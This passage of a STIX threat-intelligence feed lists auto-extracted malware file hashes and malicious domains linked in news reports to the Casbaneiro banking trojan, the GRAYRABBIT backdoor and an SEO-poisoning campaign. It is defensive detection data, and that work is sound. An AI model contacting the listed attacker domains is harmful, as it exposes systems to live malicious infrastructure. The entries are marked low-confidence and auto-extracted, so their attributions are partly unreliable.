'85767416f8d1e73833ccaa193263d1198857308b3a1185e6f4ebc4164db8584f']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f89f052-d525-468c-93ac-f4af830eb551","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 395403d6a3df9d8da179f3cd5faf81b1 HTA downloader HTA SHA-256 875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b HTA downloader HTA SHA-256 bd724bbb27f9a71fd44f1c334b003541","pattern":"[file:hashes.'SHA-256' = '875e8d4137e1016b4be869e36e00a9414e89902fd5592a2fb881ebb0e4bd2f8b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd159662-70d7-47f5-a367-c540a449da14","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: adb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c HTA downloader HTA SHA-256 e57409c5e1f8287900c1c3b3e8c099ce","pattern":"[file:hashes.'SHA-256' = '92a1428e125f33de012c7f52fb0827be3d7e90e38a0e38083181f8c3312adc9c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--566562cc-ed01-4bfb-ad28-6c99b8847018","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 9f4a7d6ac2e0385472298f384fc8 Malicious PDF lure PDF SHA-256 943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280 Malicious PDF lure PDF SHA-256 711c0aa8cde078aa349fb329e3e4","pattern":"[file:hashes.'SHA-256' = '943d63ace373ee50d074daf84d357f8e5e62ff91c829d87f566bee453d715280']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d9c0978-5232-483f-bd17-ffe25546be44","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: c00dae6812c03bba019edf9c059ece33 HTA downloader HTA SHA-256 99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1 HTA downloader HTA SHA-256 875e8d4137e1016b4be869e36e00a941","pattern":"[file:hashes.'SHA-256' = '99fcabf7c996d6ec077ccd745a158a3a395403d6a3df9d8da179f3cd5faf81b1']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4bc5906-8d2f-4467-af1a-c89e620c1eae","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 761071655fa585b64eed3bd78fc28e01 HTA downloader HTA SHA-256 a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456 HTA downloader HTA SHA-256 7e04e86c07213fed7bebccd9953818b1","pattern":"[file:hashes.'SHA-256' = 'a42daeca71a6bdc79fd66b8b6ee413562abf7f72ef093292c86c1e9e7c2be456']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f347bad-d13e-43d4-9df2-6394586bd03c","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 4e89902fd5592a2fb881ebb0e4bd2f8b HTA downloader HTA SHA-256 bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01 HTA downloader HTA SHA-256 a42daeca71a6bdc79fd66b8b6ee41356","pattern":"[file:hashes.'SHA-256' = 'bd724bbb27f9a71fd44f1c334b003541761071655fa585b64eed3bd78fc28e01']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f791a24-768d-4ca4-8575-c3f5fc9aaf7e","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8 Malicious PDF lure PDF SHA-256 943d63ace373ee50d074daf84d35","pattern":"[file:hashes.'SHA-256' = 'bf92a287a3d79afb73a3f2d38877ec37c22a9f4a7d6ac2e0385472298f384fc8']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91ac074d-410e-43b8-9b49-24b445ab327d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 485688b5958d82fcb072a837e27e246b HTA downloader HTA SHA-256 c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756 HTA downloader HTA SHA-256 6e6bd2f7566ffa52d52fa9d5f048bbb9","pattern":"[file:hashes.'SHA-256' = 'c477bdfae91e3df9be29e9eeba785467aff294f5250c2eed406765032cb68756']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6628d858-7b8e-47d7-bf96-a9ccd36645fb","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f8","pattern":"[file:hashes.'SHA-256' = 'c521b3a189b0089a2558aa4e42bd9fb5558e1b17917e2e183a4bd9cbcb2ed77e']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eae661db-a854-4390-b328-419d67075c34","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 7b3ce6db57566ed7bd0e92d03d85 Malicious PDF lure PDF SHA-256 d04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca","pattern":"[file:hashes.'SHA-256' = 'd04f68079ca90c65223a907f23fae5d068904a2145348b953b1d06e2eaf0bf2c']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8af4821f-50b4-4cae-800b-d4be5ef2de0d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85 Malicious PDF lure PDF SHA-256 d04f68079ca90c65223a907f23fa","pattern":"[file:hashes.'SHA-256' = 'd13ad6fc5fda54e65f1214e554a5123126ac7b3ce6db57566ed7bd0e92d03d85']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efca937a-842f-4847-944a-9c626a389c0d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 66a5e651ad8a64893c76a725c859 Malicious PDF lure PDF SHA-256 d910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadb","pattern":"[file:hashes.'SHA-256' = 'd910e08a11a4f6f764e7495f4602a00b6024ca6e1b70fe30ba3752b881574365']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8edd0130-a0c5-4e7c-9e2f-211d86b9e601","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 3d7e90e38a0e38083181f8c3312adc9c HTA downloader HTA SHA-256 e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207","pattern":"[file:hashes.'SHA-256' = 'e57409c5e1f8287900c1c3b3e8c099cef537a02949315eb768c88906b0c65add']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--065bab80-7eca-4f9f-ac44-2498a85bed65","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15","pattern":"[file:hashes.'SHA-256' = 'ea8af591fe2d605c82bb7831d2ebdfb17cb2659880e1a8a7b0a2dd851dc5e7a3']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6bd6857-1880-44d2-817e-aa5ee646eb32","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 8857308b3a1185e6f4ebc4164db8584f HTA downloader HTA SHA-256 f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b HTA downloader HTA SHA-256 c477bdfae91e3df9be29e9eeba785467","pattern":"[file:hashes.'SHA-256' = 'f1aa14ebfd2da477edba94b34f09f775485688b5958d82fcb072a837e27e246b']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--03f259b3-d1c5-463a-9c83-c54bb5041124","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: b07b25cc7d910 AutoIt loader component AutoIt script SHA-256 f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba AutoIt loader component Casbaneiro payload SHA-256 7de63753","pattern":"[file:hashes.'SHA-256' = 'f76d09cbd455ce18765591b9efa3bde0d31358b6321f7a10fc2e04f65d7407ba']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c14df03a-c481-4e0e-9a94-16f47add8fcc","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: 99[.]188[.]28 Campaign infrastructure AutoIt script SHA-256 fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910 AutoIt loader component AutoIt script SHA-256 f76d09cbd455c","pattern":"[file:hashes.'SHA-256' = 'fc820eeb054c781693eca78fed1c418f12b27da2c7c7e73281eb07b25cc7d910']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f570200-6f98-41b0-aa47-0c79a38e5d71","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: noht1ng.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f200843-fedf-4cff-a7f7-e2df1ae2300e","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--058bef3c-8437-46ea-a866-16f3247106fa","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: involving 7-Zip binaries. IOCs Indicator Value SHA-256 hash 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Associated file 7zp.dll File description Trojanized DLL loa","pattern":"[file:hashes.'SHA-256' = '29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a4d74a6-3620-4c19-abca-ac1514112507","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: on Trojanized DLL loader Internal name boy.dll SHA-256 hash 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Associated file p File description Encrypted PE loader shel","pattern":"[file:hashes.'SHA-256' = '749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d5c2d77-2461-4e7d-aebd-d2992311469c","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: File description Encrypted PE loader shellcode SHA-256 hash d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a Associated malware GRAYRABBIT backdoor Internal name core.d","pattern":"[file:hashes.'SHA-256' = 'd7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc6fd06d-5613-4f39-ae27-617f8a344d58","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: achievershelf.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[","pattern":"[domain-name:value = 'achievershelf.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b743d56f-a566-412f-b839-172136cc53e8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: activitykitty.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ;","pattern":"[domain-name:value = 'activitykitty.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7cd7b8c5-bd9d-4c4b-82fe-bb374517279d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: activitymeal.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[","pattern":"[domain-name:value = 'activitymeal.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e61d3006-b707-4a77-ab22-d89b537240dd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: additionplot.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju","pattern":"[domain-name:value = 'additionplot.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee915aa3-5e31-4746-a230-fd1a9a8a33ab","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: adviceturn.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl","pattern":"[domain-name:value = 'adviceturn.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a234a435-1a75-4e98-b21b-b6f58149176b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: afternoonscrew.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.","pattern":"[domain-name:value = 'afternoonscrew.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54ea08d9-2965-451f-bf0d-25dcad7b8a94","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: agreementjuice.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ;","pattern":"[domain-name:value = 'agreementjuice.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c943d08b-79e6-44af-93d3-6728ddd31669","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: airplaneiron.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ;","pattern":"[domain-name:value = 'airplaneiron.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 